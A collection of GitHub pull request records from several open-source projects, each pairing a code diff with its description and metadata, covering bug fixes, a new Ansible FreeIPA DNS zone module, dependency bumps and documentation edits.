--model-names "gpt-4,text-davinci-003,text-embedding-ada-002"
```
This will allow a single worker to perform chat, completion, and embedding.
|
https://api.github.com/repos/lm-sys/FastChat/pulls/1517
|
2023-05-27T13:28:58Z
|
2023-06-09T01:25:30Z
|
2023-06-09T01:25:30Z
|
2023-07-11T18:21:22Z
| 671
|
lm-sys/FastChat
| 41,037
|
fix #781
|
diff --git a/letsencrypt-apache/letsencrypt_apache/parser.py b/letsencrypt-apache/letsencrypt_apache/parser.py
index d7dc3c42254..823d9794bec 100644
--- a/letsencrypt-apache/letsencrypt_apache/parser.py
+++ b/letsencrypt-apache/letsencrypt_apache/parser.py
@@ -394,6 +394,8 @@ def _get_include_path(self, arg):
if not arg.startswith("/"):
# Normpath will condense ../
arg = os.path.normpath(os.path.join(self.root, arg))
+ else:
+ arg = os.path.normpath(arg)
# Attempts to add a transform to the file if one does not already exist
if os.path.isdir(arg):
diff --git a/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py b/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py
index e7bd03cc51a..64ecaa3219f 100644
--- a/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py
+++ b/letsencrypt-apache/letsencrypt_apache/tests/complex_parsing_test.py
@@ -98,6 +98,9 @@ def test_include_complex(self):
def test_include_fullpath(self):
self.verify_fnmatch(os.path.join(self.config_path, "test_fnmatch.conf"))
+ def test_include_fullpath_trailing_slash(self):
+ self.verify_fnmatch(self.config_path + "//")
+
def test_include_variable(self):
self.verify_fnmatch("../complex_parsing/${fnmatch_filename}")
|
(Addresses #781) Realized I wasn't normalizing the path when the full path was specified.
(Apache will normalize the path for you)
I added a unittest to test this case.
|
https://api.github.com/repos/certbot/certbot/pulls/782
|
2015-09-17T09:17:20Z
|
2015-09-17T18:17:18Z
|
2015-09-17T18:17:18Z
|
2016-05-06T19:22:13Z
| 358
|
certbot/certbot
| 3,457
|
Adds ipa_dnszone module
|
diff --git a/lib/ansible/modules/identity/ipa/ipa_dnszone.py b/lib/ansible/modules/identity/ipa/ipa_dnszone.py
new file mode 100644
index 00000000000000..a5d9bcb442c85a
--- /dev/null
+++ b/lib/ansible/modules/identity/ipa/ipa_dnszone.py
@@ -0,0 +1,182 @@
+#!/usr/bin/python
+# -*- coding: utf-8 -*-
+# Copyright: (c) 2017, Fran Fitzpatrick ([email protected])
+# Borrowed heavily from other work by Abhijeet Kasurde ([email protected])
+# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
+
+from __future__ import absolute_import, division, print_function
+__metaclass__ = type
+
+ANSIBLE_METADATA = {'metadata_version': '1.1',
+ 'status': ['preview'],
+ 'supported_by': 'community'}
+
+
+DOCUMENTATION = '''
+---
+module: ipa_dnszone
+author: Fran Fitzpatrick (@fxfitz)
+short_description: Manage FreeIPA DNS Zones
+description:
+- Add and delete an IPA DNS Zones using IPA API
+options:
+ zone_name:
+ description:
+ - The DNS zone name to which needs to be managed.
+ required: true
+ state:
+ description: State to ensure
+ required: false
+ default: present
+ choices: ["present", "absent"]
+ ipa_port:
+ description: Port of IPA server
+ required: false
+ default: 443
+ ipa_host:
+ description: IP or hostname of IPA server
+ required: false
+ default: localhost
+ ipa_user:
+ description: Administrative account used on IPA server
+ required: false
+ default: admin
+ ipa_pass:
+ description: Password of administrative user
+ required: true
+ ipa_prot:
+ description: Protocol used by IPA server
+ required: false
+ default: https
+ choices: ["http", "https"]
+ validate_certs:
+ description:
+ - This only applies if C(ipa_prot) is I(https).
+ - If set to C(no), the SSL certificates will not be validated.
+ - This should only set to C(no) used on personally controlled sites using self-signed certificates.
+ required: false
+ default: true
+version_added: "2.5"
+'''
+
+EXAMPLES = '''
+# Ensure dns zone is present
+- ipa_dnsrecord:
+ ipa_host: spider.example.com
+ ipa_pass: Passw0rd!
+ state: present
+ zone_name: example.com
+
+# Ensure that dns zone is removed
+- ipa_dnszone:
+ zone_name: example.com
+ ipa_host: localhost
+ ipa_user: admin
+ ipa_pass: topsecret
+ state: absent
+'''
+
+RETURN = '''
+zone:
+ description: DNS zone as returned by IPA API.
+ returned: always
+ type: dict
+'''
+
+from ansible.module_utils.basic import AnsibleModule
+from ansible.module_utils.ipa import IPAClient
+from ansible.module_utils._text import to_native
+
+
+class DNSZoneIPAClient(IPAClient):
+ def __init__(self, module, host, port, protocol):
+ super(DNSZoneIPAClient, self).__init__(module, host, port, protocol)
+
+ def dnszone_find(self, zone_name):
+ return self._post_json(
+ method='dnszone_find',
+ name=zone_name,
+ item={'idnsname': zone_name}
+ )
+
+ def dnszone_add(self, zone_name=None, details=None):
+ return self._post_json(
+ method='dnszone_add',
+ name=zone_name,
+ item={}
+ )
+
+ def dnszone_del(self, zone_name=None, record_name=None, details=None):
+ return self._post_json(
+ method='dnszone_del', name=zone_name, item={})
+
+
+def ensure(module, client):
+ zone_name = module.params['zone_name']
+ state = module.params['state']
+
+ ipa_dnszone = client.dnszone_find(zone_name)
+
+ changed = False
+ if state == 'present':
+ if not ipa_dnszone:
+ changed = True
+ if not module.check_mode:
+ client.dnszone_add(zone_name=zone_name)
+ else:
+ changed = False
+ else:
+ if ipa_dnszone:
+ changed = True
+ if not module.check_mode:
+ client.dnszone_del(zone_name=zone_name)
+
+ return changed, client.dnszone_find(zone_name)
+
+
+def main():
+ module = AnsibleModule(
+ argument_spec=dict(
+ zone_name=dict(type='str', required=True),
+ ipa_prot=dict(
+ type='str',
+ default='https',
+ choices=['http', 'https']
+ ),
+ ipa_host=dict(
+ type='str',
+ default='localhost'
+ ),
+ state=dict(
+ type='str',
+ default='present',
+ choices=['present', 'absent']
+ ),
+ ipa_port=dict(type='int', default=443),
+ ipa_user=dict(type='str', default='admin'),
+ ipa_pass=dict(type='str', required=True, no_log=True),
+ validate_certs=dict(type='bool', default=True),
+ ),
+ supports_check_mode=True,
+ )
+
+ client = DNSZoneIPAClient(
+ module=module,
+ host=module.params['ipa_host'],
+ port=module.params['ipa_port'],
+ protocol=module.params['ipa_prot']
+ )
+
+ try:
+ client.login(
+ username=module.params['ipa_user'],
+ password=module.params['ipa_pass']
+ )
+ changed, zone = ensure(module, client)
+ module.exit_json(changed=changed, zone=zone)
+ except Exception as e:
+ module.fail_json(msg=to_native(e))
+
+
+if __name__ == '__main__':
+ main()
|
##### SUMMARY
This PR adds an ipa_dnszone record.
Fixes #28789
##### ISSUE TYPE
<!--- Pick one below and delete the rest: -->
- New Module Pull Request
##### COMPONENT NAME
<!--- Name of the module/plugin/module/task -->
##### ANSIBLE VERSION
<!--- Paste verbatim output from “ansible --version” between quotes below -->
```
$ ansible --version
ansible 2.3.1.0
config file = /Users/fxfitz/dev/cyclops-ansible/ansible.cfg
configured module search path = Default w/o overrides
python version = 2.7.13 (default, May 18 2017, 22:52:22) [GCC 4.2.1 Compatible Apple LLVM 8.1.0 (clang-802.0.42)]
```
##### ADDITIONAL INFORMATION
We did not have a ipa_dnszone module, so here's one! Borrowed a lot from @Akasurde's work (thanks! made it much easier).
|
https://api.github.com/repos/ansible/ansible/pulls/28790
|
2017-08-29T18:02:32Z
|
2017-09-27T07:05:00Z
|
2017-09-27T07:05:00Z
|
2019-04-26T22:24:26Z
| 1,443
|
ansible/ansible
| 49,288
|
fix #3780
|
diff --git a/mitmproxy/proxy/protocol/http2.py b/mitmproxy/proxy/protocol/http2.py
index a5870e6c8e..89e652e3d9 100644
--- a/mitmproxy/proxy/protocol/http2.py
+++ b/mitmproxy/proxy/protocol/http2.py
@@ -87,6 +87,18 @@ class Http2Layer(base.Layer):
# mypy type hints
client_conn: connections.ClientConnection = None
+ class H2ConnLogger:
+ def __init__(self, name, log):
+ self.name = name
+ self.log = log
+
+ def debug(self, fmtstr, *args):
+ msg = "H2Conn {}: {}".format(self.name, fmtstr % args)
+ self.log(msg, "debug")
+
+ def trace(self, fmtstr, *args):
+ pass
+
def __init__(self, ctx, mode: str) -> None:
super().__init__(ctx)
self.mode = mode
@@ -98,7 +110,8 @@ def __init__(self, ctx, mode: str) -> None:
client_side=False,
header_encoding=False,
validate_outbound_headers=False,
- validate_inbound_headers=False)
+ validate_inbound_headers=False,
+ logger=self.H2ConnLogger("client", self.log))
self.connections[self.client_conn] = SafeH2Connection(self.client_conn, config=config)
def _initiate_server_conn(self):
@@ -107,7 +120,8 @@ def _initiate_server_conn(self):
client_side=True,
header_encoding=False,
validate_outbound_headers=False,
- validate_inbound_headers=False)
+ validate_inbound_headers=False,
+ logger=self.H2ConnLogger("server", self.log))
self.connections[self.server_conn] = SafeH2Connection(self.server_conn, config=config)
self.connections[self.server_conn].initiate_connection()
self.server_conn.send(self.connections[self.server_conn].data_to_send())
@@ -195,10 +209,12 @@ def _handle_data_received(self, eid, event, source_conn):
else:
self.streams[eid].data_queue.put(event.data)
self.streams[eid].queued_data_length += len(event.data)
- self.connections[source_conn].safe_acknowledge_received_data(
- event.flow_controlled_length,
- event.stream_id
- )
+
+ # always acknowledge receved data with a WINDOW_UPDATE frame
+ self.connections[source_conn].safe_acknowledge_received_data(
+ event.flow_controlled_length,
+ event.stream_id
+ )
return True
def _handle_stream_ended(self, eid):
@@ -461,7 +477,7 @@ def raise_zombie(self, pre_command=None): # pragma: no cover
if self.zombie is not None or connection_closed:
if pre_command is not None:
pre_command()
- raise exceptions.Http2ZombieException("Connection already dead")
+ raise exceptions.Http2ZombieException("Connection or stream already dead: {}, {}".format(self.zombie, connection_closed))
@detect_zombie_stream
def read_request_headers(self, flow):
@@ -643,7 +659,8 @@ def run(self):
try:
layer()
except exceptions.Http2ZombieException: # pragma: no cover
- pass
+ # zombies can be safely terminated - no need to kill them twice
+ return
except exceptions.ProtocolException as e: # pragma: no cover
self.log(repr(e), "info")
except exceptions.SetServerNotAllowedException as e: # pragma: no cover
diff --git a/setup.py b/setup.py
index 690a433a18..c5edee18c8 100644
--- a/setup.py
+++ b/setup.py
@@ -68,7 +68,7 @@
"click>=7.0,<8",
"cryptography>=2.1.4,<2.5",
"flask>=1.1.1,<1.2",
- "h2>=3.0.1,<4",
+ "h2>=3.2.0,<4",
"hyperframe>=5.1.0,<6",
"kaitaistruct>=0.7,<0.9",
"ldap3>=2.6.1,<2.7",
|
The main fix is bumping the hyper-h2 dependency.
The rest of the changes are just additional debug enhancements.
fixes #3780
|
https://api.github.com/repos/mitmproxy/mitmproxy/pulls/3815
|
2020-02-09T10:08:53Z
|
2020-02-09T12:28:39Z
|
2020-02-09T12:28:39Z
|
2020-02-09T12:28:44Z
| 957
|
mitmproxy/mitmproxy
| 28,208
|
feat(huobi) - pair create time
|
diff --git a/build/transpile.js b/build/transpile.js
index 08290c44d8d0..2f424bb20d5b 100644
--- a/build/transpile.js
+++ b/build/transpile.js
@@ -294,6 +294,7 @@ class Transpiler {
[ /\.fetchPaginatedCallDeterministic\s/g, '.fetch_paginated_call_deterministic'],
[ /\.fetchPaginatedCallCursor\s/g, '.fetch_paginated_call_cursor'],
[ /\.removeRepeatedElementsFromArray\s/g, '.remove_repeated_elements_from_array'],
+ [ /\.stringToCharsArray\s/g, '.string_to_chars_array'],
[ /\.handleUntilOption\s/g, '.handle_until_option'],
[ /\ssha(1|256|384|512)([,)])/g, ' \'sha$1\'$2'], // from js imports to this
[ /\s(md5|secp256k1|ed25519|keccak)([,)])/g, ' \'$1\'$2'], // from js imports to this
diff --git a/php/Exchange.php b/php/Exchange.php
index f1f620e45503..02f00334880e 100644
--- a/php/Exchange.php
+++ b/php/Exchange.php
@@ -2063,6 +2063,10 @@ function parse_to_big_int($value) {
return intval($value);
}
+ public function string_to_chars_array ($value) {
+ return str_split($value);
+ }
+
function valueIsDefined($value){
return isset($value) && !is_null($value);
}
diff --git a/python/ccxt/base/exchange.py b/python/ccxt/base/exchange.py
index 8b294731693e..4baa8d92695f 100644
--- a/python/ccxt/base/exchange.py
+++ b/python/ccxt/base/exchange.py
@@ -1649,6 +1649,9 @@ def clone(self, obj):
def convert_to_big_int(self, value):
return int(value) if isinstance(value, str) else value
+ def string_to_chars_array(self, value):
+ return list(value)
+
def valueIsDefined(self, value):
return value is not None
diff --git a/ts/src/base/Exchange.ts b/ts/src/base/Exchange.ts
index b07a077fee0f..dbcdf24e6feb 100644
--- a/ts/src/base/Exchange.ts
+++ b/ts/src/base/Exchange.ts
@@ -1316,6 +1316,10 @@ export default class Exchange {
return BigInt(value); // used on XT
}
+ stringToCharsArray (value) {
+ return value.split ('');
+ }
+
valueIsDefined(value){
return value !== undefined && value !== null;
}
diff --git a/ts/src/huobi.ts b/ts/src/huobi.ts
index 82f62c2f3f41..56efa6e34ffd 100644
--- a/ts/src/huobi.ts
+++ b/ts/src/huobi.ts
@@ -1699,6 +1699,13 @@ export default class huobi extends Exchange {
// 7 Settlement Completed
// 8 Delivered
// 9 Suspending of Trade
+ let created = undefined;
+ let createdDate = this.safeString (market, 'create_date'); // i.e 20230101
+ if (createdDate !== undefined) {
+ const createdArray = this.stringToCharsArray (createdDate);
+ createdDate = createdArray[0] + createdArray[1] + createdArray[2] + createdArray[3] + '-' + createdArray[4] + createdArray[5] + '-' + createdArray[6] + createdArray[7] + ' 00:00:00';
+ created = this.parse8601 (createdDate);
+ }
result.push ({
'id': id,
'lowercaseId': lowercaseId,
@@ -1751,6 +1758,7 @@ export default class huobi extends Exchange {
'max': undefined,
},
},
+ 'created': created,
'info': market,
});
}
|
https://api.github.com/repos/ccxt/ccxt/pulls/19528
|
2023-10-11T20:04:01Z
|
2023-10-17T11:40:14Z
|
2023-10-17T11:40:14Z
|
2023-10-17T12:19:00Z
| 917
|
ccxt/ccxt
| 13,668
|
|
publish_subscribe pattern
|
diff --git a/README.md b/README.md
index 8fbcd799..318adc5f 100644
--- a/README.md
+++ b/README.md
@@ -31,4 +31,5 @@ Current Patterns:
* template
* command
* memento
-* visitor
\ No newline at end of file
+* visitor
+* publish_subscribe
\ No newline at end of file
diff --git a/publish_subscribe.py b/publish_subscribe.py
new file mode 100644
index 00000000..1219ff22
--- /dev/null
+++ b/publish_subscribe.py
@@ -0,0 +1,77 @@
+#!/usr/bin/env python
+
+'''
+Reference: http://www.slideshare.net/ishraqabd/publish-subscribe-model-overview-13368808
+Author: https://github.com/HanWenfang
+'''
+
+class Provider:
+ def __init__(self):
+ self.msgQueue = []
+ self.subscribers = {}
+
+ def notify(self, msg):
+ self.msgQueue.append(msg)
+
+ def subscribe(self,msg, subscriber):
+ if not msg in self.subscribers:
+ self.subscribers[msg] = []
+ self.subscribers[msg].append(subscriber) #unfair
+ else:
+ self.subscribers[msg].append(subscriber)
+
+ def unSubscribe(self,msg, subscriber):
+ self.subscribers[msg].remove(subscriber)
+
+ def update(self):
+ for msg in self.msgQueue:
+ if msg in self.subscribers:
+ for sub in self.subscribers[msg]:
+ sub.run(msg)
+ self.msgQueue = []
+
+class Publisher:
+ def __init__(self, msgCenter):
+ self.provider = msgCenter
+
+ def publish(self, msg):
+ self.provider.notify(msg)
+
+
+class Subscriber:
+ def __init__(self,name,msgCenter):
+ self.name = name
+ self.provider = msgCenter
+
+ def subscribe(self, msg):
+ self.provider.subscribe(msg, self)
+
+ def run(self, msg):
+ print "%s got %s"%(self.name, msg)
+
+
+def main():
+ messageCenter = Provider()
+
+ fftv = Publisher(messageCenter)
+
+ jim = Subscriber("jim", messageCenter)
+ jim.subscribe("cartoon")
+ jack = Subscriber("jack", messageCenter)
+ jack.subscribe("music")
+ gee = Subscriber("gee", messageCenter)
+ gee.subscribe("movie")
+
+ fftv.publish("cartoon")
+ fftv.publish("music")
+ fftv.publish("ads")
+ fftv.publish("movie")
+ fftv.publish("cartoon")
+ fftv.publish("cartoon")
+ fftv.publish("movie")
+ fftv.publish("blank")
+
+ messageCenter.update()
+
+if __name__ == "__main__":
+ main()
|
add a simple example about publish_subscribe pattern
|
https://api.github.com/repos/faif/python-patterns/pulls/34
|
2013-12-20T06:37:03Z
|
2013-12-26T00:37:44Z
|
2013-12-26T00:37:44Z
|
2014-07-05T21:06:08Z
| 630
|
faif/python-patterns
| 33,710
|
[Fix] Update dinov2 layerscale init values
|
diff --git a/timm/models/vision_transformer.py b/timm/models/vision_transformer.py
index 0104e00701..b4f15cb8ba 100644
--- a/timm/models/vision_transformer.py
+++ b/timm/models/vision_transformer.py
@@ -1982,7 +1982,7 @@ def vit_small_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
""" ViT-S/14 for DINOv2
"""
model_args = dict(
- patch_size=14, embed_dim=384, depth=12, num_heads=6, init_values=1.0, img_size=518,
+ patch_size=14, embed_dim=384, depth=12, num_heads=6, init_values=1e-5, img_size=518,
)
model = _create_vision_transformer(
'vit_small_patch14_dinov2', pretrained=pretrained, **dict(model_args, **kwargs))
@@ -1994,7 +1994,7 @@ def vit_base_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
""" ViT-B/14 for DINOv2
"""
model_args = dict(
- patch_size=14, embed_dim=768, depth=12, num_heads=12, init_values=1.0, img_size=518,
+ patch_size=14, embed_dim=768, depth=12, num_heads=12, init_values=1e-5, img_size=518,
)
model = _create_vision_transformer(
'vit_base_patch14_dinov2', pretrained=pretrained, **dict(model_args, **kwargs))
@@ -2006,7 +2006,7 @@ def vit_large_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
""" ViT-L/14 for DINOv2
"""
model_args = dict(
- patch_size=14, embed_dim=1024, depth=24, num_heads=16, init_values=1.0, img_size=518,
+ patch_size=14, embed_dim=1024, depth=24, num_heads=16, init_values=1e-5, img_size=518,
)
model = _create_vision_transformer(
'vit_large_patch14_dinov2', pretrained=pretrained, **dict(model_args, **kwargs))
@@ -2024,7 +2024,7 @@ def vit_giant_patch14_dinov2(pretrained=False, **kwargs) -> VisionTransformer:
# With SwiGLUPacked, we need to set hidden_features = 2 * 4096 = 8192
model_args = dict(
- patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1.0,
+ patch_size=14, embed_dim=1536, depth=40, num_heads=24, init_values=1e-5,
mlp_ratio=2.66667 * 2, mlp_layer=SwiGLUPacked, img_size=518, act_layer=nn.SiLU
)
model = _create_vision_transformer(
|
This pull request addresses the issue of incorrect initial layer scale values in DINOv2. The current values on DINOv2's torchhub are inaccurate and can cause training instability when starting from scratch (although they do not affect inference results). Therefore, I have updated the values to match those used in their training configuration.
Incorrect:
https://github.com/facebookresearch/dinov2/blob/c3c2683a13cde94d4d99f523cf4170384b00c34c/hubconf.py#L27
Correct:
https://github.com/facebookresearch/dinov2/blob/c3c2683a13cde94d4d99f523cf4170384b00c34c/dinov2/configs/ssl_default_config.yaml#L75
<details>
<summary>Validaiton code</summary>
```python
import timm
import torch
pairs = [
('dinov2_vits14', 'vit_small_patch14_dinov2'),
('dinov2_vitl14', 'vit_large_patch14_dinov2'),
('dinov2_vitg14', 'vit_giant_patch14_dinov2'),
]
# Fused attention will cause a slight difference in the output
timm.layers.config.set_fused_attn(enable=False)
# Use deterministic algorithms for reproducibility
torch.use_deterministic_algorithms(True)
x = torch.randn(1, 3, 518, 518)
for p0, p1 in pairs:
m0 = torch.hub.load('facebookresearch/dinov2', p0)
m0.eval()
m1 = timm.create_model(p1, pretrained=True)
m1.eval()
with torch.no_grad():
y0 = m0.forward_features(x)
y1 = m1.forward_features(x)
y0 = torch.cat([y0["x_norm_clstoken"][:, None], y0["x_norm_patchtokens"]], dim=1)
absolute_error = torch.abs(y0 - y1).mean()
print(f"{p0} error: {absolute_error:.8f}")
assert absolute_error <= 1e-6, f"{p0} check failed"
```
```txt
dinov2_vits14 error: 0.00000000
dinov2_vitl14 error: 0.00000000
dinov2_vitg14 error: 0.00000000
```
</details>
|
https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1823
|
2023-05-24T16:24:21Z
|
2023-05-25T00:40:45Z
|
2023-05-25T00:40:45Z
|
2023-05-25T00:40:45Z
| 709
|
huggingface/pytorch-image-models
| 16,374
|
Update books.md
|
diff --git a/books.md b/books.md
index 9721d55b..8fee91ef 100644
--- a/books.md
+++ b/books.md
@@ -74,7 +74,6 @@ The following is a list of free, open source books on machine learning, statisti
* [Introduction to Probability](http://athenasc.com/probbook.html) - Book and course by MIT
* [The Elements of Statistical Learning: Data Mining, Inference, and Prediction.](http://statweb.stanford.edu/~tibs/ElemStatLearn/) - Book
* [An Introduction to Statistical Learning with Applications in R](http://www-bcf.usc.edu/~gareth/ISL/) - Book
-* [Learning Statistics Using R](http://health.adelaide.edu.au/psychology/ccs/teaching/lsr/)
* [Introduction to Probability and Statistics Using R](https://cran.r-project.org/web/packages/IPSUR/vignettes/IPSUR.pdf) - Book
* [Advanced R Programming](http://adv-r.had.co.nz) - Book
* [Practical Regression and Anova using R](http://cran.r-project.org/doc/contrib/Faraway-PRA.pdf) - Book
|
The link for "Learning statistics using R" is invalid. I could not find a PDF link online.
|
https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/460
|
2017-12-15T23:18:11Z
|
2017-12-17T19:30:05Z
|
2017-12-17T19:30:05Z
|
2017-12-18T09:25:37Z
| 262
|
josephmisiti/awesome-machine-learning
| 52,534
|
fix_jpeg_live_preview
|
diff --git a/modules/shared_state.py b/modules/shared_state.py
index 33996691c40..759a47481ff 100644
--- a/modules/shared_state.py
+++ b/modules/shared_state.py
@@ -162,5 +162,7 @@ def do_set_current_image(self):
errors.record_exception()
def assign_current_image(self, image):
+ if shared.opts.live_previews_image_format == 'jpeg' and image.mode == 'RGBA':
+ image = image.convert('RGB')
self.current_image = image
self.id_live_preview += 1
|
## Description
If user set in the setttings live preview format to jpeg, it produces error connected with RGBA mode, if any extension uses live preview
- https://github.com/light-and-ray/sd-webui-lama-cleaner-masked-content/issues/4
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
|
https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/15102
|
2024-03-03T12:57:01Z
|
2024-03-04T07:30:24Z
|
2024-03-04T07:30:24Z
|
2024-03-04T07:43:18Z
| 124
|
AUTOMATIC1111/stable-diffusion-webui
| 39,979
|
Create convert celsius into fahrenheit
|
diff --git a/convert celsius into fahrenheit b/convert celsius into fahrenheit
new file mode 100644
index 0000000000..df58fcda9d
--- /dev/null
+++ b/convert celsius into fahrenheit
@@ -0,0 +1,4 @@
+cels= float(input("enter temp in celsius"))
+print("temprature in celsius is :",cels)
+fahr = cels*9/5+32
+print("temprature in fahrenhite is :",fahr)
|
using this code we can easily convert celsius into fahrenheit
|
https://api.github.com/repos/geekcomputers/Python/pulls/1020
|
2020-10-05T11:00:55Z
|
2020-10-10T20:20:24Z
|
2020-10-10T20:20:24Z
|
2020-10-10T20:20:24Z
| 121
|
geekcomputers/Python
| 31,661
|
Update README.md
|
diff --git a/README.md b/README.md
index fb96fc0a9..08a50cb70 100755
--- a/README.md
+++ b/README.md
@@ -4,7 +4,7 @@ We are unlocking the power of large language models. Our latest version of Llama
This release includes model weights and starting code for pretrained and fine-tuned Llama language models — ranging from 7B to 70B parameters.
-This repository is intended as a minimal example to load [Llama 2](https://ai.meta.com/research/publications/llama-2-open-foundation-and-fine-tuned-chat-models/) models and run inference. For more detailed examples leveraging HuggingFace, see [llama-recipes](https://github.com/facebookresearch/llama-recipes/).
+This repository is intended as a minimal example to load [Llama 2](https://ai.meta.com/research/publications/llama-2-open-foundation-and-fine-tuned-chat-models/) models and run inference. For more detailed examples leveraging Hugging Face, see [llama-recipes](https://github.com/facebookresearch/llama-recipes/).
## Download
|
HuggingFace -> Hugging Face
|
https://api.github.com/repos/meta-llama/llama/pulls/492
|
2023-07-22T05:48:01Z
|
2023-08-31T19:37:44Z
|
2023-08-31T19:37:44Z
|
2023-08-31T19:37:44Z
| 258
|
meta-llama/llama
| 31,958
|
textgen-silence-output-feature in terminal
|
diff --git a/libs/langchain/langchain/llms/textgen.py b/libs/langchain/langchain/llms/textgen.py
index 5f83dc08b96c91..6b409ecb12f692 100644
--- a/libs/langchain/langchain/llms/textgen.py
+++ b/libs/langchain/langchain/llms/textgen.py
@@ -208,7 +208,6 @@ def _call(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
):
combined_text_output += chunk.text
- print(prompt + combined_text_output)
result = combined_text_output
else:
@@ -220,7 +219,6 @@ def _call(
if response.status_code == 200:
result = response.json()["results"][0]["text"]
- print(prompt + result)
else:
print(f"ERROR: response: {response}")
result = ""
@@ -256,7 +254,6 @@ async def _acall(
prompt=prompt, stop=stop, run_manager=run_manager, **kwargs
):
combined_text_output += chunk.text
- print(prompt + combined_text_output)
result = combined_text_output
else:
@@ -268,7 +265,6 @@ async def _acall(
if response.status_code == 200:
result = response.json()["results"][0]["text"]
- print(prompt + result)
else:
print(f"ERROR: response: {response}")
result = ""
|
Hello,
Added the new feature to silence TextGen's output in the terminal.
- Description: Added a new feature to control printing of TextGen's output to the terminal.,
- Issue: the issue #TextGen parameter to silence the print in terminal #10337 it fixes (if applicable)
Thanks;
|
https://api.github.com/repos/langchain-ai/langchain/pulls/10402
|
2023-09-09T11:45:04Z
|
2023-09-11T21:20:36Z
|
2023-09-11T21:20:36Z
|
2023-09-11T21:20:36Z
| 329
|
langchain-ai/langchain
| 43,378
|
Don't try to insert queue records if no downstream dag
|
diff --git a/airflow/datasets/manager.py b/airflow/datasets/manager.py
index 2b009c1b09f23..83539d596540d 100644
--- a/airflow/datasets/manager.py
+++ b/airflow/datasets/manager.py
@@ -61,7 +61,9 @@ def register_dataset_change(
extra=extra,
)
)
- self._queue_dagruns(dataset_model, session)
+ if dataset_model.consuming_dags:
+ self._queue_dagruns(dataset_model, session)
+ session.flush()
def _queue_dagruns(self, dataset: DatasetModel, session: Session) -> None:
# Possible race condition: if multiple dags or multiple (usually
@@ -91,8 +93,6 @@ def _slow_path_queue_dagruns(self, dataset: DatasetModel, session: Session) -> N
except exc.IntegrityError:
self.log.debug("Skipping record %s", item, exc_info=True)
- session.flush()
-
def _postgres_queue_dagruns(self, dataset: DatasetModel, session: Session) -> None:
from sqlalchemy.dialects.postgresql import insert
@@ -101,7 +101,6 @@ def _postgres_queue_dagruns(self, dataset: DatasetModel, session: Session) -> No
stmt,
[{'target_dag_id': target_dag.dag_id} for target_dag in dataset.consuming_dags],
)
- session.flush()
def resolve_dataset_manager() -> "DatasetManager":
diff --git a/tests/datasets/test_manager.py b/tests/datasets/test_manager.py
index 4ff3b2884740b..42dffd76a11fd 100644
--- a/tests/datasets/test_manager.py
+++ b/tests/datasets/test_manager.py
@@ -80,3 +80,17 @@ def test_register_dataset_change(self, session, dag_maker, mock_task_instance):
# Ensure we've created a dataset
assert session.query(DatasetEvent).filter_by(dataset_id=dsm.id).count() == 1
assert session.query(DatasetDagRunQueue).count() == 2
+
+ def test_register_dataset_change_no_downstreams(self, session, mock_task_instance):
+ dsem = DatasetManager()
+
+ ds = Dataset(uri="never_consumed")
+ dsm = DatasetModel(uri="never_consumed")
+ session.add(dsm)
+ session.flush()
+
+ dsem.register_dataset_change(task_instance=mock_task_instance, dataset=ds, session=session)
+
+ # Ensure we've created a dataset
+ assert session.query(DatasetEvent).filter_by(dataset_id=dsm.id).count() == 1
+ assert session.query(DatasetDagRunQueue).count() == 0
|
https://api.github.com/repos/apache/airflow/pulls/26257
|
2022-09-09T02:18:54Z
|
2022-09-09T13:04:17Z
|
2022-09-09T13:04:17Z
|
2022-09-12T15:57:04Z
| 611
|
apache/airflow
| 14,566
|
|
[doc] add feature diffusion v2, bloom, auto-parallel
|
diff --git a/README-zh-Hans.md b/README-zh-Hans.md
index 57cf90586004..ec9014deb361 100644
--- a/README-zh-Hans.md
+++ b/README-zh-Hans.md
@@ -38,12 +38,12 @@
<li>
<a href="#并行训练样例展示">并行训练样例展示</a>
<ul>
- <li><a href="#ViT">ViT</a></li>
<li><a href="#GPT-3">GPT-3</a></li>
<li><a href="#GPT-2">GPT-2</a></li>
<li><a href="#BERT">BERT</a></li>
<li><a href="#PaLM">PaLM</a></li>
<li><a href="#OPT">OPT</a></li>
+ <li><a href="#ViT">ViT</a></li>
<li><a href="#推荐系统模型">推荐系统模型</a></li>
</ul>
</li>
@@ -59,6 +59,7 @@
<ul>
<li><a href="#GPT-3-Inference">GPT-3</a></li>
<li><a href="#OPT-Serving">1750亿参数OPT在线推理服务</a></li>
+ <li><a href="#BLOOM-Inference">1750亿参数 BLOOM</a></li>
</ul>
</li>
<li>
@@ -102,6 +103,7 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
- 1维, [2维](https://arxiv.org/abs/2104.05343), [2.5维](https://arxiv.org/abs/2105.14500), [3维](https://arxiv.org/abs/2105.14450) 张量并行
- [序列并行](https://arxiv.org/abs/2105.13120)
- [零冗余优化器 (ZeRO)](https://arxiv.org/abs/1910.02054)
+ - [自动并行](https://github.com/hpcaitech/ColossalAI/tree/main/examples/language/gpt/auto_parallel_with_gpt)
- 异构内存管理
- [PatrickStar](https://arxiv.org/abs/2108.05818)
- 使用友好
@@ -113,12 +115,7 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
<p align="right">(<a href="#top">返回顶端</a>)</p>
## 并行训练样例展示
-### ViT
-<p align="center">
-<img src="https://raw.githubusercontent.com/hpcaitech/public_assets/main/colossalai/img/ViT.png" width="450" />
-</p>
-- 14倍批大小和5倍训练速度(张量并行=64)
### GPT-3
<p align="center">
@@ -153,6 +150,12 @@ Colossal-AI 为您提供了一系列并行组件。我们的目标是让您的
